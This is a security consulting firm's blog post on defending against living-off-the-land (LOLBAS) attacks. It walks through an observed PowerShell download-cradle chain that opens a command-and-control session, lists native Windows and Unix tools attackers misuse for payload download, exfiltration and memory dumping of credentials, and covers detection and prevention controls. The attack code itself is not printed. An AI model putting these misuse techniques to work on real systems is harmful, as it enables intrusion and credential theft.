menucloseContact UsEventsNewssearchclose
Services
Industries
Insights
About Us
Careers
Contact UsEventsNews
searchclose

Defending against LOLBAS attacks

Francisco Vasquez
Cybersecurity Watch
| 9/6/2023
Defending against LOLBAS attacks

Understanding LOLBAS is the key difference between spotting real threats and dismissing them as false positives.

In the ever-changing landscape of cybersecurity, organizations face relentless threats from sophisticated adversaries. To combat these threats effectively, a multilayered defense approach is crucial. One such powerful combination is the integration of managed detection and response (MDR) with the concept of living off the land binaries (LOLBins) and executables. By combining MDR with knowledge of LOL attacks, organizations can improve their security posture and cyber resilience.

From LOLBins to LOLBAS

LOLBins are legitimate executables or binaries commonly used on operating systems that attackers can misuse to carry out malicious activities. Since these binaries are part of the operating system or legitimate software, they often bypass traditional security measures and are difficult to detect if they are performing malicious activity. Attackers can abuse LOLBins to execute commands, escalate privileges, move laterally within a network, or even achieve persistence.

Threat actors use legitimate binaries to blend in with normal system behavior and make it difficult for security solutions to differentiate between legitimate and malicious activities. Over time, the original concept of LOLBins has expanded to include scripts and libraries, and thus the name has evolved to “living off the land binaries and scripts” (LOLBAS).

Sign up to receive the latest cybersecurity insights on identifying threats, managing risk, and strengthening your organization’s security posture.
Subscribe now

MDR and the importance of understanding LOLBAS 

MDR is a cybersecurity service that combines advanced technologies and human expertise to continually monitor and detect cyberthreats. MDR providers use threat detection tools, analytics, and threat intelligence to identify suspicious activities, perform incident investigations, and respond effectively to security incidents. It offers organizations proactive threat hunting, continuous monitoring, incident response, and access to cybersecurity professionals.

For MDR to be effective, security teams need to be aware of LOLBAS and understand their use on different operating systems. By monitoring and analyzing the behavior of LOLBAS, security professionals can detect anomalous or suspicious activities and identify potential attacks.

They can also employ techniques such as application control, behavior monitoring, and anomaly detection to detect and mitigate the misuse of LOLBAS.

How LOLBAS attacks work

Microsoft PowerShell™ is a powerful yet common LOLBAS that threat actors abuse. Although PowerShell is a scripting language that is regularly used for building, testing, and deploying solutions, it can also execute fileless malware on systems without leaving a trace. Note that PowerShell’s qualification for the official LOLBAS list is disputed. However, based on how easily it can be abused, it’s important to scrutinize it as such.

In the following process tree of an observed attack, the user opens a malicious Microsoft Excel™ file from Microsoft Outlook™, which then executes a PowerShell process of reaching out to the internet to download a malicious payload onto the system and allowing a command and control session to initiate.

PowerShell attack process breakdown

Defending against LOLBAS attacks - Flowchart
Source: Crowe analysis, August 2023

The following piece of code demonstrates how the payload was downloaded and executed in the system, providing a command and control session for the attacker.

Defending against LOLBAS attacks

In terms of the command line process, PowerShell is called from its file system location, pinging google.com for internet connectivity. After establishing connectivity, a virtual-based security file payload downloads and executes in the user’s temp folder directory, establishing a command and control session. The execution of the PowerShell download cradle is obfuscated with regex and concatenation since the strings are separated. The strings are also read from right to left to confuse the antivirus solution in place. By using PowerShell, the threat actor gains a basic foothold into the system with little to no detection.

Thwarting PowerShell attacks

Microsoft introduced security updates to PowerShell in version 5.0 and implemented further enhancements in PowerShell 7.0 and in Microsoft Defender™ and its anti-malware scan interface. These updates have made it more difficult for bad actors to use PowerShell.

Information security (or blue) teams can use enhanced logging features and implement preventive controls such as PowerShell ConstrainedLanguage mode, Microsoft Windows™ AppLocker™, and Windows Defender Application Control to fend off PowerShell attacks.

Other LOLBAS entry points

Beyond PowerShell, attackers abuse other native tools on common operating systems for nefarious purposes. Of the 184 current known and tracked LOLBAS (including the 376 known abuseable Unix™ binaries), a few common LOLBAS organizations should keep an eye out for include:

  • Rundll32/Regsvr32 can be used to download, register, and run dynamic link libraries, which are essentially mini executables used as building blocks for larger programs. 
  • Msiexec/Bitsadmin can be used by a macro to download the first stage of a payload and execute it. 
  • Certutil can be used to decode a file from base64 and output to a specified file type. 
  • Wmic can be used to execute commands remotely and exfiltrate information. 
  • Wget can be used for downloading payloads from the internet. 
  • Wscript/Mshta can be used to execute scripts, typically via Word document macros. 
  • Msbuild can be used to compile and execute code on the fly. 
  • Procdump can be used to create a memory dump of sensitive programs to access the keys and passwords they are using. 
  • Rm can be used for deleting files from a Unix or Linux™ file system. 
  • Cp can be used to perform privileged reads to disclose files or writes to files outside a restricted files system.   

Addressing LOLBAS attacks with MDR

As organizations navigate the complex landscape of cybersecurity, integrating MDR services with knowledge of LOLBAS can be a game changer. Combining the power of continuous monitoring, proactive threat hunting, and real-time incident response with the ability to detect and mitigate LOL-based attacks can help organizations significantly enhance their security posture.

By embracing the dynamic MDR-LOLBAS duo, organizations can establish a robust defense against advanced adversaries and maintain a resilient security infrastructure.

Microsoft, AppLocker, Excel, Microsoft Defender, Outlook, PowerShell, and Windows are trademarks of the Microsoft group of companies.

Cybersecurity Blue team Cyber resilience Security assessments Vulnerability
Previous Post Next Post